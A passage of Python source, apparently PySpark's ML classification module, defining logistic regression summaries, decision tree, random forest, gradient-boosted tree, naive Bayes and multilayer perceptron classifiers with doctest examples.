raise ValueError("Logistic Regression getThreshold only applies to" +
" binary classification, but thresholds has length != 2." +
" thresholds: " + ",".join(ts))
t = 1.0/(1.0 + ts[0]/ts[1])
t2 = self.getParam(self.threshold)
if abs(t2 - t) >= 1E-5:
raise ValueError("Logistic Regression getThreshold found inconsistent values for" +
" threshold (%g) and thresholds (equivalent to %g)" % (t2, t))
@since("2.1.0")
def setFamily(self, value):
"""
Sets the value of :py:attr:`family`.
"""
return self._set(family=value)
@since("2.1.0")
def getFamily(self):
"""
Gets the value of :py:attr:`family` or its default value.
"""
return self.getOrDefault(self.family)
class LogisticRegressionModel(JavaModel, JavaClassificationModel, JavaMLWritable, JavaMLReadable):
"""
Model fitted by LogisticRegression.
.. versionadded:: 1.3.0
"""
@property
@since("2.0.0")
def coefficients(self):
"""
Model coefficients of binomial logistic regression.
An exception is thrown in the case of multinomial logistic regression.
"""
return self._call_java("coefficients")
@property
@since("1.4.0")
def intercept(self):
"""
Model intercept of binomial logistic regression.
An exception is thrown in the case of multinomial logistic regression.
"""
return self._call_java("intercept")
@property
@since("2.1.0")
def coefficientMatrix(self):
"""
Model coefficients.
"""
return self._call_java("coefficientMatrix")
@property
@since("2.1.0")
def interceptVector(self):
"""
Model intercept.
"""
return self._call_java("interceptVector")
@property
@since("2.0.0")
def summary(self):
"""
Gets summary (e.g. accuracy/precision/recall, objective history, total iterations) of model
trained on the training set. An exception is thrown if `trainingSummary is None`.
"""
if self.hasSummary:
java_blrt_summary = self._call_java("summary")
# Note: Once multiclass is added, update this to return correct summary
return BinaryLogisticRegressionTrainingSummary(java_blrt_summary)
else:
raise RuntimeError("No training summary available for this %s" %
self.__class__.__name__)
@property
@since("2.0.0")
def hasSummary(self):
"""
Indicates whether a training summary exists for this model
instance.
"""
return self._call_java("hasSummary")
@since("2.0.0")
def evaluate(self, dataset):
"""
Evaluates the model on a test dataset.
:param dataset:
Test dataset to evaluate model on, where dataset is an
instance of :py:class:`pyspark.sql.DataFrame`
"""
if not isinstance(dataset, DataFrame):
raise ValueError("dataset must be a DataFrame but got %s." % type(dataset))
java_blr_summary = self._call_java("evaluate", dataset)
return BinaryLogisticRegressionSummary(java_blr_summary)
class LogisticRegressionSummary(JavaWrapper):
"""
.. note:: Experimental
Abstraction for Logistic Regression Results for a given model.
.. versionadded:: 2.0.0
"""
@property
@since("2.0.0")
def predictions(self):
"""
Dataframe outputted by the model's `transform` method.
"""
return self._call_java("predictions")
@property
@since("2.0.0")
def probabilityCol(self):
"""
Field in "predictions" which gives the probability
of each class as a vector.
"""
return self._call_java("probabilityCol")
@property
@since("2.0.0")
def labelCol(self):
"""
Field in "predictions" which gives the true label of each
instance.
"""
return self._call_java("labelCol")
@property
@since("2.0.0")
def featuresCol(self):
"""
Field in "predictions" which gives the features of each instance
as a vector.
"""
return self._call_java("featuresCol")
@inherit_doc
class LogisticRegressionTrainingSummary(LogisticRegressionSummary):
"""
.. note:: Experimental
Abstraction for multinomial Logistic Regression Training results.
Currently, the training summary ignores the training weights except
for the objective trace.
.. versionadded:: 2.0.0
"""
@property
@since("2.0.0")
def objectiveHistory(self):
"""
Objective function (scaled loss + regularization) at each
iteration.
"""
return self._call_java("objectiveHistory")
@property
@since("2.0.0")
def totalIterations(self):
"""
Number of training iterations until termination.
"""
return self._call_java("totalIterations")
@inherit_doc
class BinaryLogisticRegressionSummary(LogisticRegressionSummary):
"""
.. note:: Experimental
Binary Logistic regression results for a given model.
.. versionadded:: 2.0.0
"""
@property
@since("2.0.0")
def roc(self):
"""
Returns the receiver operating characteristic (ROC) curve,
which is a Dataframe having two fields (FPR, TPR) with
(0.0, 0.0) prepended and (1.0, 1.0) appended to it.
.. seealso:: `Wikipedia reference \
<http://en.wikipedia.org/wiki/Receiver_operating_characteristic>`_
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("roc")
@property
@since("2.0.0")
def areaUnderROC(self):
"""
Computes the area under the receiver operating characteristic
(ROC) curve.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("areaUnderROC")
@property
@since("2.0.0")
def pr(self):
"""
Returns the precision-recall curve, which is a Dataframe
containing two fields recall, precision with (0.0, 1.0) prepended
to it.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("pr")
@property
@since("2.0.0")
def fMeasureByThreshold(self):
"""
Returns a dataframe with two fields (threshold, F-Measure) curve
with beta = 1.0.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("fMeasureByThreshold")
@property
@since("2.0.0")
def precisionByThreshold(self):
"""
Returns a dataframe with two fields (threshold, precision) curve.
Every possible probability obtained in transforming the dataset
are used as thresholds used in calculating the precision.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("precisionByThreshold")
@property
@since("2.0.0")
def recallByThreshold(self):
"""
Returns a dataframe with two fields (threshold, recall) curve.
Every possible probability obtained in transforming the dataset
are used as thresholds used in calculating the recall.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("recallByThreshold")
@inherit_doc
class BinaryLogisticRegressionTrainingSummary(BinaryLogisticRegressionSummary,
LogisticRegressionTrainingSummary):
"""
.. note:: Experimental
Binary Logistic regression training results for a given model.
.. versionadded:: 2.0.0
"""
pass
class TreeClassifierParams(object):
"""
Private class to track supported impurity measures.
.. versionadded:: 1.4.0
"""
supportedImpurities = ["entropy", "gini"]
impurity = Param(Params._dummy(), "impurity",
"Criterion used for information gain calculation (case-insensitive). " +
"Supported options: " +
", ".join(supportedImpurities), typeConverter=TypeConverters.toString)
def __init__(self):
super(TreeClassifierParams, self).__init__()
@since("1.6.0")
def setImpurity(self, value):
"""
Sets the value of :py:attr:`impurity`.
"""
return self._set(impurity=value)
@since("1.6.0")
def getImpurity(self):
"""
Gets the value of impurity or its default value.
"""
return self.getOrDefault(self.impurity)
class GBTParams(TreeEnsembleParams):
"""
Private class to track supported GBT params.
.. versionadded:: 1.4.0
"""
supportedLossTypes = ["logistic"]
@inherit_doc
class DecisionTreeClassifier(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol,
HasProbabilityCol, HasRawPredictionCol, DecisionTreeParams,
TreeClassifierParams, HasCheckpointInterval, HasSeed, JavaMLWritable,
JavaMLReadable):
"""
`Decision tree <http://en.wikipedia.org/wiki/Decision_tree_learning>`_
learning algorithm for classification.
It supports both binary and multiclass labels, as well as both continuous and categorical
features.
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.feature import StringIndexer
>>> df = spark.createDataFrame([
... (1.0, Vectors.dense(1.0)),
... (0.0, Vectors.sparse(1, [], []))], ["label", "features"])
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> si_model = stringIndexer.fit(df)
>>> td = si_model.transform(df)
>>> dt = DecisionTreeClassifier(maxDepth=2, labelCol="indexed")
>>> model = dt.fit(td)
>>> model.numNodes
3
>>> model.depth
1
>>> model.featureImportances
SparseVector(1, {0: 1.0})
>>> model.numFeatures
1
>>> model.numClasses
2
>>> print(model.toDebugString)
DecisionTreeClassificationModel (uid=...) of depth 1 with 3 nodes...
>>> test0 = spark.createDataFrame([(Vectors.dense(-1.0),)], ["features"])
>>> result = model.transform(test0).head()
>>> result.prediction
0.0
>>> result.probability
DenseVector([1.0, 0.0])
>>> result.rawPrediction
DenseVector([1.0, 0.0])
>>> test1 = spark.createDataFrame([(Vectors.sparse(1, [0], [1.0]),)], ["features"])
>>> model.transform(test1).head().prediction
1.0
>>> dtc_path = temp_path + "/dtc"
>>> dt.save(dtc_path)
>>> dt2 = DecisionTreeClassifier.load(dtc_path)
>>> dt2.getMaxDepth()
2
>>> model_path = temp_path + "/dtc_model"
>>> model.save(model_path)
>>> model2 = DecisionTreeClassificationModel.load(model_path)
>>> model.featureImportances == model2.featureImportances
True
.. versionadded:: 1.4.0
"""
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini",
seed=None):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini", \
seed=None)
"""
super(DecisionTreeClassifier, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.DecisionTreeClassifier", self.uid)
self._setDefault(maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
impurity="gini")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
impurity="gini", seed=None):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini", \
seed=None)
Sets params for the DecisionTreeClassifier.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return DecisionTreeClassificationModel(java_model)
@inherit_doc
class DecisionTreeClassificationModel(DecisionTreeModel, JavaClassificationModel, JavaMLWritable,
JavaMLReadable):
"""
Model fitted by DecisionTreeClassifier.
.. versionadded:: 1.4.0
"""
@property
@since("2.0.0")
def featureImportances(self):
"""
Estimate of the importance of each feature.
This generalizes the idea of "Gini" importance to other losses,
following the explanation of Gini importance from "Random Forests" documentation
by Leo Breiman and Adele Cutler, and following the implementation from scikit-learn.
This feature importance is calculated as follows:
- importance(feature j) = sum (over nodes which split on feature j) of the gain,
where gain is scaled by the number of instances passing through node
- Normalize importances for tree to sum to 1.
.. note:: Feature importance for single decision trees can have high variance due to
correlated predictor variables. Consider using a :py:class:`RandomForestClassifier`
to determine feature importance instead.
"""
return self._call_java("featureImportances")
@inherit_doc
class RandomForestClassifier(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol, HasSeed,
HasRawPredictionCol, HasProbabilityCol,
RandomForestParams, TreeClassifierParams, HasCheckpointInterval,
JavaMLWritable, JavaMLReadable):
"""
`Random Forest <http://en.wikipedia.org/wiki/Random_forest>`_
learning algorithm for classification.
It supports both binary and multiclass labels, as well as both continuous and categorical
features.
>>> import numpy
>>> from numpy import allclose
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.feature import StringIndexer
>>> df = spark.createDataFrame([
... (1.0, Vectors.dense(1.0)),
... (0.0, Vectors.sparse(1, [], []))], ["label", "features"])
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> si_model = stringIndexer.fit(df)
>>> td = si_model.transform(df)
>>> rf = RandomForestClassifier(numTrees=3, maxDepth=2, labelCol="indexed", seed=42)
>>> model = rf.fit(td)
>>> model.featureImportances
SparseVector(1, {0: 1.0})
>>> allclose(model.treeWeights, [1.0, 1.0, 1.0])
True
>>> test0 = spark.createDataFrame([(Vectors.dense(-1.0),)], ["features"])
>>> result = model.transform(test0).head()
>>> result.prediction
0.0
>>> numpy.argmax(result.probability)
0
>>> numpy.argmax(result.rawPrediction)
0
>>> test1 = spark.createDataFrame([(Vectors.sparse(1, [0], [1.0]),)], ["features"])
>>> model.transform(test1).head().prediction
1.0
>>> model.trees
[DecisionTreeClassificationModel (uid=...) of depth..., DecisionTreeClassificationModel...]
>>> rfc_path = temp_path + "/rfc"
>>> rf.save(rfc_path)
>>> rf2 = RandomForestClassifier.load(rfc_path)
>>> rf2.getNumTrees()
3
>>> model_path = temp_path + "/rfc_model"
>>> model.save(model_path)
>>> model2 = RandomForestClassificationModel.load(model_path)
>>> model.featureImportances == model2.featureImportances
True
.. versionadded:: 1.4.0
"""
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini",
numTrees=20, featureSubsetStrategy="auto", seed=None, subsamplingRate=1.0):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini", \
numTrees=20, featureSubsetStrategy="auto", seed=None, subsamplingRate=1.0)
"""
super(RandomForestClassifier, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.RandomForestClassifier", self.uid)
self._setDefault(maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
impurity="gini", numTrees=20, featureSubsetStrategy="auto",
subsamplingRate=1.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, seed=None,
impurity="gini", numTrees=20, featureSubsetStrategy="auto", subsamplingRate=1.0):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, seed=None, \
impurity="gini", numTrees=20, featureSubsetStrategy="auto", subsamplingRate=1.0)
Sets params for linear classification.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return RandomForestClassificationModel(java_model)
class RandomForestClassificationModel(TreeEnsembleModel, JavaClassificationModel, JavaMLWritable,
JavaMLReadable):
"""
Model fitted by RandomForestClassifier.
.. versionadded:: 1.4.0
"""
@property
@since("2.0.0")
def featureImportances(self):
"""
Estimate of the importance of each feature.
Each feature's importance is the average of its importance across all trees in the ensemble
The importance vector is normalized to sum to 1. This method is suggested by Hastie et al.
(Hastie, Tibshirani, Friedman. "The Elements of Statistical Learning, 2nd Edition." 2001.)
and follows the implementation from scikit-learn.
.. seealso:: :py:attr:`DecisionTreeClassificationModel.featureImportances`
"""
return self._call_java("featureImportances")
@property
@since("2.0.0")
def trees(self):
"""Trees in this ensemble. Warning: These have null parent Estimators."""
return [DecisionTreeClassificationModel(m) for m in list(self._call_java("trees"))]
@inherit_doc
class GBTClassifier(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol, HasMaxIter,
GBTParams, HasCheckpointInterval, HasStepSize, HasSeed, JavaMLWritable,
JavaMLReadable):
"""
`Gradient-Boosted Trees (GBTs) <http://en.wikipedia.org/wiki/Gradient_boosting>`_
learning algorithm for classification.
It supports binary labels, as well as both continuous and categorical features.
The implementation is based upon: J.H. Friedman. "Stochastic Gradient Boosting." 1999.
Notes on Gradient Boosting vs. TreeBoost:
- This implementation is for Stochastic Gradient Boosting, not for TreeBoost.
- Both algorithms learn tree ensembles by minimizing loss functions.
- TreeBoost (Friedman, 1999) additionally modifies the outputs at tree leaf nodes
based on the loss function, whereas the original gradient boosting method does not.
- We expect to implement TreeBoost in the future:
`SPARK-4240 <https://issues.apache.org/jira/browse/SPARK-4240>`_
.. note:: Multiclass labels are not currently supported.
>>> from numpy import allclose
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.feature import StringIndexer
>>> df = spark.createDataFrame([
... (1.0, Vectors.dense(1.0)),
... (0.0, Vectors.sparse(1, [], []))], ["label", "features"])
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> si_model = stringIndexer.fit(df)
>>> td = si_model.transform(df)
>>> gbt = GBTClassifier(maxIter=5, maxDepth=2, labelCol="indexed", seed=42)
>>> model = gbt.fit(td)
>>> model.featureImportances
SparseVector(1, {0: 1.0})
>>> allclose(model.treeWeights, [1.0, 0.1, 0.1, 0.1, 0.1])
True
>>> test0 = spark.createDataFrame([(Vectors.dense(-1.0),)], ["features"])
>>> model.transform(test0).head().prediction
0.0
>>> test1 = spark.createDataFrame([(Vectors.sparse(1, [0], [1.0]),)], ["features"])
>>> model.transform(test1).head().prediction
1.0
>>> model.totalNumNodes
15
>>> print(model.toDebugString)
GBTClassificationModel (uid=...)...with 5 trees...
>>> gbtc_path = temp_path + "gbtc"
>>> gbt.save(gbtc_path)
>>> gbt2 = GBTClassifier.load(gbtc_path)
>>> gbt2.getMaxDepth()
2
>>> model_path = temp_path + "gbtc_model"
>>> model.save(model_path)
>>> model2 = GBTClassificationModel.load(model_path)
>>> model.featureImportances == model2.featureImportances
True
>>> model.treeWeights == model2.treeWeights
True
>>> model.trees
[DecisionTreeRegressionModel (uid=...) of depth..., DecisionTreeRegressionModel...]
.. versionadded:: 1.4.0
"""
lossType = Param(Params._dummy(), "lossType",
"Loss function which GBT tries to minimize (case-insensitive). " +
"Supported options: " + ", ".join(GBTParams.supportedLossTypes),
typeConverter=TypeConverters.toString)
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, lossType="logistic",
maxIter=20, stepSize=0.1, seed=None, subsamplingRate=1.0):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, \
lossType="logistic", maxIter=20, stepSize=0.1, seed=None, subsamplingRate=1.0)
"""
super(GBTClassifier, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.GBTClassifier", self.uid)
self._setDefault(maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
lossType="logistic", maxIter=20, stepSize=0.1, subsamplingRate=1.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
lossType="logistic", maxIter=20, stepSize=0.1, seed=None, subsamplingRate=1.0):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, \
lossType="logistic", maxIter=20, stepSize=0.1, seed=None, subsamplingRate=1.0)
Sets params for Gradient Boosted Tree Classification.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return GBTClassificationModel(java_model)
@since("1.4.0")
def setLossType(self, value):
"""
Sets the value of :py:attr:`lossType`.
"""
return self._set(lossType=value)
@since("1.4.0")
def getLossType(self):
"""
Gets the value of lossType or its default value.
"""
return self.getOrDefault(self.lossType)
class GBTClassificationModel(TreeEnsembleModel, JavaPredictionModel, JavaMLWritable,
JavaMLReadable):
"""
Model fitted by GBTClassifier.
.. versionadded:: 1.4.0
"""
@property
@since("2.0.0")
def featureImportances(self):
"""
Estimate of the importance of each feature.
Each feature's importance is the average of its importance across all trees in the ensemble
The importance vector is normalized to sum to 1. This method is suggested by Hastie et al.
(Hastie, Tibshirani, Friedman. "The Elements of Statistical Learning, 2nd Edition." 2001.)
and follows the implementation from scikit-learn.
.. seealso:: :py:attr:`DecisionTreeClassificationModel.featureImportances`
"""
return self._call_java("featureImportances")
@property
@since("2.0.0")
def trees(self):
"""Trees in this ensemble. Warning: These have null parent Estimators."""
return [DecisionTreeRegressionModel(m) for m in list(self._call_java("trees"))]
@inherit_doc
class NaiveBayes(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol, HasProbabilityCol,
HasRawPredictionCol, HasThresholds, HasWeightCol, JavaMLWritable, JavaMLReadable):
"""
Naive Bayes Classifiers.
It supports both Multinomial and Bernoulli NB. `Multinomial NB
<http://nlp.stanford.edu/IR-book/html/htmledition/naive-bayes-text-classification-1.html>`_
can handle finitely supported discrete data. For example, by converting documents into
TF-IDF vectors, it can be used for document classification. By making every vector a
binary (0/1) data, it can also be used as `Bernoulli NB
<http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html>`_.
The input feature values must be nonnegative.
>>> from pyspark.sql import Row
>>> from pyspark.ml.linalg import Vectors
>>> df = spark.createDataFrame([
... Row(label=0.0, weight=0.1, features=Vectors.dense([0.0, 0.0])),
... Row(label=0.0, weight=0.5, features=Vectors.dense([0.0, 1.0])),
... Row(label=1.0, weight=1.0, features=Vectors.dense([1.0, 0.0]))])
>>> nb = NaiveBayes(smoothing=1.0, modelType="multinomial", weightCol="weight")
>>> model = nb.fit(df)
>>> model.pi
DenseVector([-0.81..., -0.58...])
>>> model.theta
DenseMatrix(2, 2, [-0.91..., -0.51..., -0.40..., -1.09...], 1)
>>> test0 = sc.parallelize([Row(features=Vectors.dense([1.0, 0.0]))]).toDF()
>>> result = model.transform(test0).head()
>>> result.prediction
1.0
>>> result.probability
DenseVector([0.32..., 0.67...])
>>> result.rawPrediction
DenseVector([-1.72..., -0.99...])
>>> test1 = sc.parallelize([Row(features=Vectors.sparse(2, [0], [1.0]))]).toDF()
>>> model.transform(test1).head().prediction
1.0
>>> nb_path = temp_path + "/nb"
>>> nb.save(nb_path)
>>> nb2 = NaiveBayes.load(nb_path)
>>> nb2.getSmoothing()
1.0
>>> model_path = temp_path + "/nb_model"
>>> model.save(model_path)
>>> model2 = NaiveBayesModel.load(model_path)
>>> model.pi == model2.pi
True
>>> model.theta == model2.theta
True
>>> nb = nb.setThresholds([0.01, 10.00])
>>> model3 = nb.fit(df)
>>> result = model3.transform(test0).head()
>>> result.prediction
0.0
.. versionadded:: 1.5.0
"""
smoothing = Param(Params._dummy(), "smoothing", "The smoothing parameter, should be >= 0, " +
"default is 1.0", typeConverter=TypeConverters.toFloat)
modelType = Param(Params._dummy(), "modelType", "The model type which is a string " +
"(case-sensitive). Supported options: multinomial (default) and bernoulli.",
typeConverter=TypeConverters.toString)
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction", smoothing=1.0,
modelType="multinomial", thresholds=None, weightCol=None):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", smoothing=1.0, \
modelType="multinomial", thresholds=None, weightCol=None)
"""
super(NaiveBayes, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.NaiveBayes", self.uid)
self._setDefault(smoothing=1.0, modelType="multinomial")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.5.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction", smoothing=1.0,
modelType="multinomial", thresholds=None, weightCol=None):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", smoothing=1.0, \
modelType="multinomial", thresholds=None, weightCol=None)
Sets params for Naive Bayes.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return NaiveBayesModel(java_model)
@since("1.5.0")
def setSmoothing(self, value):
"""
Sets the value of :py:attr:`smoothing`.
"""
return self._set(smoothing=value)
@since("1.5.0")
def getSmoothing(self):
"""
Gets the value of smoothing or its default value.
"""
return self.getOrDefault(self.smoothing)
@since("1.5.0")
def setModelType(self, value):
"""
Sets the value of :py:attr:`modelType`.
"""
return self._set(modelType=value)
@since("1.5.0")
def getModelType(self):
"""
Gets the value of modelType or its default value.
"""
return self.getOrDefault(self.modelType)
class NaiveBayesModel(JavaModel, JavaClassificationModel, JavaMLWritable, JavaMLReadable):
"""
Model fitted by NaiveBayes.
.. versionadded:: 1.5.0
"""
@property
@since("2.0.0")
def pi(self):
"""
log of class priors.
"""
return self._call_java("pi")
@property
@since("2.0.0")
def theta(self):
"""
log of class conditional probabilities.
"""
return self._call_java("theta")
@inherit_doc
class MultilayerPerceptronClassifier(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol,
HasMaxIter, HasTol, HasSeed, HasStepSize, JavaMLWritable,
JavaMLReadable):
"""
Classifier trainer based on the Multilayer Perceptron.
Each layer has sigmoid activation function, output layer has softmax.
Number of inputs has to be equal to the size of feature vectors.
Number of outputs has to be equal to the total number of labels.
>>> from pyspark.ml.linalg import Vectors
>>> df = spark.createDataFrame([
... (0.0, Vectors.dense([0.0, 0.0])),
... (1.0, Vectors.dense([0.0, 1.0])),
... (1.0, Vectors.dense([1.0, 0.0])),
... (0.0, Vectors.dense([1.0, 1.0]))], ["label", "features"])
>>> mlp = MultilayerPerceptronClassifier(maxIter=100, layers=[2, 2, 2], blockSize=1, seed=123)
>>> model = mlp.fit(df)
>>> model.layers
[2, 2, 2]
>>> model.weights.size
12
>>> testDF = spark.createDataFrame([
... (Vectors.dense([1.0, 0.0]),),
... (Vectors.dense([0.0, 0.0]),)], ["features"])
>>> model.transform(testDF).show()
+---------+----------+
| features|prediction|
+---------+----------+
|[1.0,0.0]| 1.0|
|[0.0,0.0]| 0.0|
+---------+----------+
...
>>> mlp_path = temp_path + "/mlp"
>>> mlp.save(mlp_path)
>>> mlp2 = MultilayerPerceptronClassifier.load(mlp_path)
>>> mlp2.getBlockSize()
1
>>> model_path = temp_path + "/mlp_model"
>>> model.save(model_path)
>>> model2 = MultilayerPerceptronClassificationModel.load(model_path)
>>> model.layers == model2.layers
True
>>> model.weights == model2.weights
True
>>> mlp2 = mlp2.setInitialWeights(list(range(0, 12)))
>>> model3 = mlp2.fit(df)
>>> model3.weights != model2.weights
True
>>> model3.layers == model.layers
True
.. versionadded:: 1.6.0
"""
layers = Param(Params._dummy(), "layers", "Sizes of layers from input layer to output layer " +
"E.g., Array(780, 100, 10) means 780 inputs, one hidden layer with 100 " +
"neurons and output layer of 10 neurons.",
typeConverter=TypeConverters.toListInt)
blockSize = Param(Params._dummy(), "blockSize", "Block size for stacking input data in " +
"matrices. Data is stacked within partitions. If block size is more than " +
"remaining data in a partition then it is adjusted to the size of this " +
"data. Recommended size is between 10 and 1000, default is 128.",
typeConverter=TypeConverters.toInt)
solver = Param(Params._dummy(), "solver", "The solver algorithm for optimization. Supported " +
"options: l-bfgs, gd.", typeConverter=TypeConverters.toString)
initialWeights = Param(Params._dummy(), "initialWeights", "The initial weights of the model.",
typeConverter=TypeConverters.toVector)
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxIter=100, tol=1e-6, seed=None, layers=None, blockSize=128, stepSize=0.03,
solver="l-bfgs", initialWeights=None):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxIter=100, tol=1e-6, seed=None, layers=None, blockSize=128, stepSize=0.03, \
solver="l-bfgs", initialWeights=None)
"""
super(MultilayerPerceptronClassifier, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.MultilayerPerceptronClassifier", self.uid)
self._setDefault(maxIter=100, tol=1E-4, blockSize=128, stepSize=0.03, solver="l-bfgs")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.6.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxIter=100, tol=1e-6, seed=None, layers=None, blockSize=128, stepSize=0.03,
solver="l-bfgs", initialWeights=None):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxIter=100, tol=1e-6, seed=None, layers=None, blockSize=128, stepSize=0.03, \
solver="l-bfgs", initialWeights=None)
Sets params for MultilayerPerceptronClassifier.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return MultilayerPerceptronClassificationModel(java_model)
@since("1.6.0")
def setLayers(self, value):
"""
Sets the value of :py:attr:`layers`.
"""
return self._set(layers=value)
@since("1.6.0")
def getLayers(self):
"""
Gets the value of layers or its default value.
"""
return self.getOrDefault(self.layers)
@since("1.6.0")
def setBlockSize(self, value):
"""
Sets the value of :py:attr:`blockSize`.
"""
return self._set(blockSize=value)
@since("1.6.0")
def getBlockSize(self):
"""
Gets the value of blockSize or its default value.
"""
return self.getOrDefault(self.blockSize)
@since("2.0.0")
def setStepSize(self, value):
"""
Sets the value of :py:attr:`stepSize`.
"""
return self._set(stepSize=value)
@since("2.0.0")
def getStepSize(self):
"""
Gets the value of stepSize or its default value.
"""
return self.getOrDefault(self.stepSize)
@since("2.0.0")
